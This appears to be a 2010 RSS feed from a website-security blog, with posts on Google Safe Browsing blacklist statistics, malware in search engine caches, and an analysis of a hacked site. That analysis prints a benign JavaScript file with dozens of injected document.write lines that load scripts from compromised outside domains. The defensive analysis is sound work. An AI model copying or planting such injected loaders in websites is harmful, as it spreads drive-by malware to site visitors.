<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>stopthehacker.com &#187; malware</title>
	<atom:link href="http://www.stopthehacker.com/tag/malware/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.stopthehacker.com</link>
	<description>Jaal, LLC</description>
	<lastBuildDate>Wed, 01 Sep 2010 18:08:05 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Analyzing the Google Blacklist, Part 2</title>
		<link>http://www.stopthehacker.com/2010/06/30/analyzing-the-google-blacklist-part-2/</link>
		<comments>http://www.stopthehacker.com/2010/06/30/analyzing-the-google-blacklist-part-2/#comments</comments>
		<pubDate>Wed, 30 Jun 2010 16:37:43 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[monitoring]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1857</guid>
		<description><![CDATA[Building on our first article in the series, we continue to analyze the Google Safe Browsing List. In this part, we present more detailed statistics about the hashes seen on the blacklist and try to provide insight into what we observe.
Motivation
Understanding the behavior of infected websites is very important. This provides security researchers with strategies [...]]]></description>
			<content:encoded><![CDATA[<p>Building on our first article in the series, we continue to analyze the <a href="http://www.google.com/tools/firefox/safebrowsing" target="_blank">Google Safe Browsing List</a>. In this part, we present more detailed statistics about the hashes seen on the blacklist and try to provide insight into what we observe.</p>
<p><strong>Motivation</strong><br />
Understanding the behavior of infected websites is very important. This provides security researchers with strategies to help deal a blow to the bad guys and at the same time, provide website owners and administrators an idea of the current state of website security.</p>
<p>Since the publication of our last article in this series, we have received good feedback from our colleagues in security. We will attempt to incorporate their comments and concerns in this part of the series.</p>
<p><strong>Methodology</strong><br />
We discussed the aim of this experiment and methodology in the <a href="http://www.stopthehacker.com/2010/06/28/analyzing-the-google-blacklist/">last part of this series</a>. We won&#8217;t repeat them here, but we encourage you to take a look at our first article in this series if you haven&#8217;t already read it!</p>
<p><strong>Analysis</strong><br />
Below we present some graphs which provide more information about the analysis.</p>
<ul>
<li><strong>Websites have a high probability of getting hacked on a Wednesday!</strong></li>
</ul>
<div id="attachment_1876" class="wp-caption aligncenter" style="width: 449px"><img class="size-full wp-image-1876" title="Websites have a high probability of getting hacked on a Wednesday!" src="http://www.stopthehacker.com/wp-content/uploads/2010/06/gma1.gif" alt="Websites have a high probability of getting hacked on a Wednesday!" width="439" height="328" /><p class="wp-caption-text">Websites have a high probability of getting hacked on a Wednesday!</p></div>
<ul>
<li><strong>Websites have a high probability of getting hacked between 7-8 PM PDT.</strong></li>
</ul>
<div id="attachment_1877" class="wp-caption aligncenter" style="width: 502px"><img class="size-full wp-image-1877" title="Websites have a high probability of getting hacked between 7-8 PM PDT." src="http://www.stopthehacker.com/wp-content/uploads/2010/06/gma2.gif" alt="Websites have a high probability of getting hacked between 7-8 PM PDT." width="492" height="337" /><p class="wp-caption-text">Websites have a high probability of getting hacked between 7-8 PM PDT.</p></div>
<ul>
<li>On Monday websites get hacked most between 11 AM to 12 Noon, PDT</li>
<li>On Tuesday websites get hacked most between 9 AM to 10 AM, PDT</li>
<li>On Wednesday websites get hacked most between 7 PM to 8 PM, PDT</li>
<li>On Thursday websites get hacked most between 10 PM to 11 PM, PDT</li>
<li>On Friday websites get hacked most between 11 AM to 12 Noon, PDT</li>
<li>On Saturday websites get hacked most between 1 PM to 2 PM, PDT</li>
<li>On Sunday websites get hacked most between 11 AM to 12 Noon, PDT</li>
</ul>
<p>Note: Most hashes which stay on the blacklist (over the 113 day period) seem to get added to the blacklist on Wednesday.</p>
<p><strong>Conclusions</strong><br />
We have presented more interesting statistics regarding the appearance of website hashes on the Google Safe Browsing List. These statistics provide information which website administrators and owners can use better arm themselves with against attackers. We will continue analyzing the dataset to provide more interesting information. If you have any questions please add a comment.</p>
<p>At <a href="http://www.stopthehacker.com" target="_self">stopthehacker.com</a>, we work hard to help you combat malicious hackers. If you would like to work with us, please drop us an <a href="http://www.stopthehacker.com/contact/" target="_self">email</a>. You can also visit our <a href="http://www.stopthehacker.com/services/" target="_self">services</a> page to find out how we can help you, in fact you can even sign up for <a href="http://www.stopthehacker.com/services/blacklist-monitoring/" target="_blank">free</a> services!</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/06/30/analyzing-the-google-blacklist-part-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Analyzing the Google Blacklist, Part 1</title>
		<link>http://www.stopthehacker.com/2010/06/28/analyzing-the-google-blacklist/</link>
		<comments>http://www.stopthehacker.com/2010/06/28/analyzing-the-google-blacklist/#comments</comments>
		<pubDate>Mon, 28 Jun 2010 17:52:36 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[blacklist]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[monitoring]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1833</guid>
		<description><![CDATA[Google&#8217;s efforts to clean up the Internet and provide a useful advisory to Internet users has been very successful. Nearly every modern browser now incorporates Google&#8217;s Safe Browsing List information, to prevent users from inadvertently visiting malware infested websites and phishing websites.
Motivation
In this article we will be analyzing the Google malware hash lists that have [...]]]></description>
			<content:encoded><![CDATA[<p>Google&#8217;s efforts to clean up the Internet and provide a useful advisory to Internet users has been very successful. Nearly every modern browser now incorporates <a href="http://www.google.com/tools/firefox/safebrowsing" target="_blank">Google&#8217;s Safe Browsing List</a> information, to prevent users from inadvertently visiting malware infested websites and phishing websites.</p>
<p><strong>Motivation</strong><br />
In this article we will be analyzing the Google malware hash lists that have been published over the past few months in order to answer these important questions:</p>
<ul>
<li>How many websites get blacklisted each day?</li>
<li>How many websites manage to get off the blacklist?</li>
<li>How soon do websites get off the blacklist?</li>
<li>How many never get off the blacklist?</li>
</ul>
<p>These are practical questions which are often posed by frustrated, sometimes confused and angry website owners, time and time again at help forums, and via our contact page.</p>
<p><strong>Resources</strong><br />
Google has done a good job creating detailed <a href="http://www.google.com/webmasters/tools/" target="_blank">help</a> content describing the process of blacklisting, as well as a <a href="http://www.google.com/support/forum/p/Webmasters/label?lid=2fe2a8ee8e37c08e&amp;hl=en">group</a> where website owners can ask for help. Additionally there are excellent resources like <a href="http://www.badwarebusters.org">BadwareBusters</a> where users can find volunteers to help them. We also participate in these groups.</p>
<p>Yet, there is still a demand for getting clear cut answers to some basic questions like the ones detailed above. In this vein we want to provide scientifically sound and statistically significant analysis of freely available information to provide clear answers to these questions. A small <a href="/faq/" target="_blank">FAQ</a> is also available on our site to answer questions from website owners and admins.</p>
<p><strong>Goals</strong><br />
This series of experiments is split into multiple parts. This article presents a first look (part 1) at openly available data. The goal of the experiment is to understand:</p>
<ul>
<li>How many websites get blacklisted each day?</li>
<li>How many websites manage to get off the blacklist?</li>
<li>How soon do websites get off the blacklist?</li>
<li>How many never get off the blacklist?</li>
<li>How many websites fall back onto the blacklist?</li>
<li>How much time elapses before a website falls back into the blacklist?</li>
</ul>
<p><strong>Methodology</strong><br />
For the purposes of this experiment, Google malware hash lists were collected from March 3, 2010 to June 1, 2010 (113 days). Malware hash lists were collected every 30 minutes. Each malware hash list contains the information in the Google malware hash specification. All hash lists were parsed and unique hashes were extracted and time stamped, and correlated with the malware hash list version.</p>
<p>Subsequently an analysis was conducted to answer the questions posed above. At no point was an attempt identify a website name from the hashes. Also, note that a single website can have more than one unique hash. For example: &#8220;www.abcd.com&#8221;, &#8220;abcd.com&#8221;, and &#8220;www.abcd.com/infected/&#8221; can all generate different hashes.</p>
<p><strong>Brief Highlights</strong></p>
<ul>
<li><strong>Total number of unique hashes tracked: 688,602.</strong></li>
<li><strong>Average number of unique hashes per day (over 113 day period): 6093.</strong></li>
<li><strong>25.8% of hashes never got off the Google blacklist.</strong><br />
Each one of these unique hashes was deemed infected for over 3 months (greater than 113 days).</li>
<li><strong>43% of hashes were listed exactly once as infected and managed to get off the Google blacklist.</strong><br />
The average time each of these hashes was blacklisted was 13 days (89 days max).</li>
<li><strong>2% of hashes were blacklisted exactly twice.</strong><br />
Each one of these hashes was blacklisted, was then removed from the blacklist and then fell back in (the sites were hacked again). These sites remained infected for an average of 19 days (89 days max), and remained clean for an average of 17 days before being hacked again.</li>
</ul>
<p><strong>Analysis</strong><br />
It is clear from these initial results that a very large number of websites, <strong>nearly one quarter of the 6000 hashes added per day never make it off the Google blacklist</strong>. There are a number of reasons for this. One being that most webmasters, who may be good at website design and layouts, may not have the technical skills which are required to clean websites infected by malware and code injection attacks. We have also met website owners who are extremely business savvy, but lack the technical expertise to recover from a blacklisting event. The income lost due to business interruption in these cases is considerable.</p>
<p>We see that 43% of websites which get blacklisted manage to make it off the blacklist, but <strong>these websites suffer for an average period of 13 days</strong>.</p>
<p>Some websites manage to get off the blacklist and then fall in again. The average time for these &#8220;repeat offenders&#8221; on the blacklist is larger than the previous case. <strong>The time for which these &#8220;repeat offenders&#8221; stay clean is not very high, an average of just 17 days.</strong></p>
<p><strong>Conclusion</strong><br />
These numbers clearly show the current sorry state of website security. It is unfortunate that thousands of websites are affected every day. At <a href="/" target="_self">stopthehacker.com</a>, we strive to help combat this trend.  These issues need to be addressed specifically by services that currently are not readily available to the masses. To address this vacuum in the service space, and disrupt the security market <a href="/" target="_self">stopthehacker.com</a> provides its advanced <a href="http://www.stopthehacker.com/services/health-monitoring/" target="_self">Health Monitoring</a> and <a href="http://www.stopthehacker.com/services/risk-assessment/" target="_blank">Vulnerability assessment</a> services for website owners. Our services take away the anguish which business owners face when their websites are attacked. Please visit our <a href="/services/" target="_self">services</a> page to find out how we can help you. In fact, you can even sign up for <a href="/services/blacklist-monitoring/" target="_blank">free</a> services.</p>
<p>Further detailed analysis will be presented in the second part of this series. We will show detailed analysis of the data and will provide more insight on the implications of these observations.</p>
<p>Stay tuned for Part 2!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/06/28/analyzing-the-google-blacklist/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hackers Understand the Value of Backups</title>
		<link>http://www.stopthehacker.com/2010/05/04/hackers-understand-the-value-of-backups/</link>
		<comments>http://www.stopthehacker.com/2010/05/04/hackers-understand-the-value-of-backups/#comments</comments>
		<pubDate>Tue, 04 May 2010 18:17:13 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[document.write]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1585</guid>
		<description><![CDATA[Hackers have been trying new tricks to obfuscate their malicious code and sneak it surreptitiously into benign websites. This trend is ever increasing as websites are now the weakest link in the entire malware chain. Hackers discover vulnerabilities in websites, exploit them to inject malicious bad code and voila &#8211; you have at your disposal [...]]]></description>
			<content:encoded><![CDATA[<p>Hackers have been trying new tricks to obfuscate their malicious code and sneak it surreptitiously into benign websites. This trend is ever increasing as websites are now the weakest link in the entire malware chain. Hackers discover vulnerabilities in websites, exploit them to inject malicious bad code and voila &#8211; you have at your disposal a &#8220;trusted&#8221; website &#8211; lots of web surfers will drop by, and in turn get infected with the hacker&#8217;s malicious code. This vicious cycle of malware has become a very attractive modus operandi for the dark figures of the Internet.</p>
<p><strong>Overview</strong></p>
<p>This post will show an example of a trend about which we <a href="http://www.stopthehacker.com/2009/12/09/when-benign-scripts-attack-v/" target="_blank">first blogged</a> a few months ago. We will concentrate on the way hackers use &#8220;backup-sources&#8221; to infect visitors to a compromised website. If this does not make sense yet, hold on for just a few seconds more.</p>
<p>Quite recently we blogged about how hackers are using benign and useful JavaScript hosted locally on accounts managed by the website owner/admin to spread malware. Hackers have injected malicious code right into useful snippets of JavaScript which do everything from displaying menu buttons, drop down choices and much much more. Take a look at our previous findings: <a href="http://www.stopthehacker.com/2009/12/02/when-benign-scripts-attack-iv/" target="_blank">here</a>.</p>
<p><strong>An Example</strong></p>
<p>Everyday we find websites which are infected with malicious code which follows the same principles. In fact, we now monitor over 1 million websites!</p>
<p><em>Website name: ipac-bd.org<br />
Time of latest scan: 15:33:10 PDT on 2010/05/03</em></p>
<p>In this example, the website was hosting JavaScript which had been compromised by a hacker. The hacker had inserted various script elements at the very end of the benign JavaScript being used by the website. It&#8217;s likely that the website owner never saw this coming, and probably did not realize what was going on until he was blacklisted.</p>
<p><strong>The &#8220;Backup&#8221; Strategy</strong></p>
<p>Take a look at the example below: clearly the hacker used multiple websites which he has compromised as the &#8220;loading point&#8221; for the malicious payload injected as part of the benign JavaScript. It&#8217;s almost funny when one realizes the number of websites this hacker has used as backups for his malicious code.</p>
<p>In this example the hacker has used 30 different infected websites to try and load his malicious code. The frequency distribution of the infectious websites which the hacker has used to distribute his malware is present below. It seems that hackers understand the concept of a &#8220;backup-strategy&#8221; well. An interesting point to probe further would be to understand why the frequency distribution of the infected sites is the way it is.</p>
<div id="attachment_1590" class="wp-caption aligncenter" style="width: 619px"><img src="http://www.stopthehacker.com/wp-content/uploads/2010/05/hacker-backup-e1273450693501.jpg" alt="Frequency distribution of infected websites used in the transmission of malware." title="Frequency distribution of infected websites used in the transmission of malware." width="609" height="324" class="size-full wp-image-1590" /><p class="wp-caption-text">Frequency distribution of infected websites used in the transmission of malware.</p></div>
<p><span id="more-1585"></span><br />
<strong>Example Code</strong></p>
<pre class="brush: plain;">
element.style.top    = top + 'px';
element.style.left   = left + 'px';
element.style.height = element._originalHeight;
element.style.width  = element._originalWidth;
}
}

// Safari returns margins on body which is incorrect if the child is absolutely
// positioned.  For performance reasons, redefine Position.cumulativeOffset for
// KHTML/WebKit only.
if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {
Position.cumulativeOffset = function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop  || 0;
valueL += element.offsetLeft || 0;
if (element.offsetParent == document.body)
if (Element.getStyle(element, 'position') == 'absolute') break;

element = element.offsetParent;
} while (element);

return [valueL, valueT];
}
}
element.style.top    = top + 'px';
element.style.left   = left + 'px';
element.style.height = element._originalHeight;
element.style.width  = element._originalWidth;
}
}
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mesalina.pl/logs/COPYRIGHT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mesalina.pl/logs/COPYRIGHT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mesalina.pl/logs/COPYRIGHT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mesalina.pl/logs/COPYRIGHT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://nzoz.org/css/paginacja.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://nzoz.org/css/paginacja.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://nzoz.org/css/paginacja.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://nzoz.org/css/paginacja.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://nzoz.org/css/paginacja.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://1-2-3security.com/images/products_housing.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://devinjarvis.com/modlogan/index.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://forumonly5.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://balajidentalcare.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://balajidentalcare.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://balajidentalcare.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://balajidentalcare.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://balajidentalcare.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://coimbatore4u.com/WAP/default.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://coimbatore4u.com/WAP/default.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://coimbatore4u.com/WAP/default.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://precilub.com/lang/favicon.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://potaz.truelife.com/files/SQLyogTunnelz.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://asterisk-e-services.com/server/faq.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://asterisk-e-services.com/server/faq.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://asterisk-e-services.com/server/faq.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://newlifecareplus.com/images/LeftBar.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://newlifecareplus.com/images/LeftBar.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://newlifecareplus.com/images/LeftBar.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://newlifecareplus.com/images/LeftBar.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://newlifecareplus.com/images/LeftBar.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://foot-jobss.co.cc/wp-includes/wp-config-sample.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bollyqueens.com/hot/showtopad.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bollyqueens.com/hot/showtopad.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bollyqueens.com/hot/showtopad.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bollyqueens.com/hot/showtopad.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://almos-agroliga.ru/agroaddress/woodwork.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://jakojonevar.webphoto.ir/photos/restoreg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://eumentum.com/newtrans/page_home.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://eumentum.com/newtrans/page_home.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://eumentum.com/newtrans/page_home.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://eumentum.com/newtrans/page_home.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://pracemladaboleslav.cz/wp-admin/license.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://travelgenerators.com/Images/Dubai.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://allocinema.net/wp-admin/wp-commentsrss2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php &gt;&lt;/script&gt;');
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/05/04/hackers-understand-the-value-of-backups/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Yes, Search Engines Can Infect Your Computer</title>
		<link>http://www.stopthehacker.com/2010/03/08/can-search-engines-infect-your-computer-yes/</link>
		<comments>http://www.stopthehacker.com/2010/03/08/can-search-engines-infect-your-computer-yes/#comments</comments>
		<pubDate>Mon, 08 Mar 2010 17:00:27 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[bing]]></category>
		<category><![CDATA[cache]]></category>
		<category><![CDATA[engine]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[pages]]></category>
		<category><![CDATA[search]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1472</guid>
		<description><![CDATA[Search engines, like Google, Yahoo and Bing offer users the ability to scour the plethora of information on the Internet. These search engines index content on websites and often maintain cached copies of these sites so that, in the event that the site is unavailable, visitors can still view the contents of the website.
Unfortunately, the [...]]]></description>
			<content:encoded><![CDATA[<p>Search engines, like <a href="http://www.google.com" target="_blank">Google</a>, <a href="http://search.yahoo.com" target="_blank">Yahoo</a> and <a href="http://www.bing.com" target="_blank">Bing</a> offer users the ability to scour the plethora of information on the Internet. These search engines index content on websites and often maintain cached copies of these sites so that, in the event that the site is unavailable, visitors can still view the contents of the website.</p>
<p>Unfortunately, the idea of page caching has not been implemented well. In fact, page caching has opened up new opportunities for malware. The primary problem being that, from a security perspective, when search engines cache copies of websites, they are storing any malware that is present on the site on their own infrastructure as well.</p>
<h3>Hackers Exploit Search Engine Page Caches</h3>
<p>Most large search engines use some kind of malware analysis to determine if a website is compromised or not. Google for example, has a well tuned system with high accuracy. In our meeting with the Google malware team, some months ago, we were glad to find that they were already aware of this problem. In the weeks following our interaction, cached copies of infected websites were no longer easily available via searches.</p>
<p>Not so long ago, we wrote an article about <a href="http://www.stopthehacker.com/2009/11/25/yahoo-hosting-malware-are-you-serious/" target="_blank">our efforts to alert Yahoo</a> of the presence of malware in the cached versions of various web pages served up by their search engine. Our efforts were not successful, although the occurrence of malware in Yahoo cached pages seems to have gone down significantly. Perhaps our messages were not entirely ignored.</p>
<p>Recently, an article came up on <a href="http://isc.sans.org/diary.html?storyid=7768&amp;" target="_blank">ISC SANS</a> discussing this very same issue.</p>
<p>Recently, we have found instances of Bing serving up malware in their cached pages. It seems that Bing&#8217;s malware detection methods are not able to reliably detect malware on cached web pages. This keeps Bing from securing cached pages which contain malware for its users. We have provided screen shots below as an example of the issue. In this particular case, the strain of malware found in Bing cached pages has been around since 2009.</p>
<h3>Search Engines Ignore the Problem</h3>
<p>Consider the case where a malicious individual deliberately infects a website with malware and Bing (or another search engine) indexes it. The malicious individual can then send out hyperlinks pointing to the cached web pages hosted by Bing. Any kind of &#8220;reputation-checking&#8221; for the cached link will confirm that the page is hosted by a reputable company, in this case, Bing (Microsoft). However, the malware will still be able to deliver its payload. Just in case you&#8217;re thinking, &#8220;my antivirus will protect me from the malware on the cached page,&#8221; you may like to <a href="http://www.stopthehacker.com/2009/12/11/catch-me-if-you-can-antivirus-poor-at-detecting-web-malware/" target="_blank">read this article</a>.</p>
<p>It is surprising to see that search engines like Bing, which claim to implement malware detection, cannot correctly determine if a cached copy of a web page hosts malware! In these cases, Bing ends up an excellent attack vector for malicious individual.</p>
<p>It remains to be seen if search engine companies will continue to serve up cached pages laced with malware at the same time as they are touting active scan and detection mechanisms. Let&#8217;s hope this article can get attention in the upper echelons of management at these large search giants and they start to pay attention to this problem.</p>
<p><strong>Screen shots follow below:</strong></p>

<a href='http://www.stopthehacker.com/2010/03/08/can-search-engines-infect-your-computer-yes/bing_cache_malware_1/' title='Cache page served up Bing: contains Malware'><img width="150" height="150" src="http://www.stopthehacker.com/wp-content/uploads/2010/03/bing_cache_malware_1-150x150.jpg" class="attachment-thumbnail" alt="" title="Cache page served up Bing: contains Malware" /></a>
<a href='http://www.stopthehacker.com/2010/03/08/can-search-engines-infect-your-computer-yes/malware/' title='Malware in source code of cached page served by Bing'><img width="150" height="150" src="http://www.stopthehacker.com/wp-content/uploads/2010/03/malware-150x150.png" class="attachment-thumbnail" alt="" title="Malware in source code of cached page served by Bing" /></a>

]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/03/08/can-search-engines-infect-your-computer-yes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Virus Infects 13 Million PCs, Steals Credit Card Numbers</title>
		<link>http://www.stopthehacker.com/2010/03/02/virus-infects-13-million-pcs-steals-credit-card-numbers/</link>
		<comments>http://www.stopthehacker.com/2010/03/02/virus-infects-13-million-pcs-steals-credit-card-numbers/#comments</comments>
		<pubDate>Wed, 03 Mar 2010 03:50:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
